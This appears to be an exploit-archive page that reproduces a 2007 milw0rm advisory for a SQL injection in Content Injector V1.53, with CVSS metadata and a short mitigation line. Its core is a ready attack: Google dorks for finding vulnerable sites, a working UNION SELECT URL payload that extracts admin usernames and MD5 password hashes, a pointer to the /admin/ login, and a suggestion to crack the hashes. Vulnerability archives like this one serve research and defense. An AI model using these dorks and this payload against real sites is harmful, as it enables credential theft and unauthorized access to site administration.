header-logo
Suggest Exploit
vendor:
Content Injector
by:
S.W.A.T.
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Content Injector
Affected Version From: Content Injector V1.53
Affected Version To: Content Injector V1.53
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Content Injector V1.53 SQL Injection Vulnerability

The vulnerability allows an attacker to see the admin user and MD5 password, which can be cracked.

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+             Content Injector V1.53 SQL Injection Vulnerbility                  +==--
--==+================================================================================+==--


AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://www.p3mbo.com/cinj153.zip

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by Content Injector v1.53"
Dork2(google):  Powered by Content Injector v1.53

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It   ;)  

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:
www.site.com/index.php?action=expand&id=99999/**/union/**/select/**/1,2,username,4,5,password,7,8,9/**/from/**/users/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:
admin login is at /admin/  It Is New Version With New Query & Different Between The Last One I Found

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

About Me:
Maybe I Give Bye To NET  :(  1 month later :((

I'm Suposed To Die These Days

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

GREETZ: All Xmors Digital Security Team - Str0ke
Own Page: wWw.SvvaT.IR
Group Site: wWw.XmorS.CoM


--==+================================================================================+==--
--==+             Content Injector V1.53 SQL Injection Vulnerbility                  +==--
--==+================================================================================+==--

# milw0rm.com [2007-12-09]

Navigation

Suggest Exploit

Services By CQR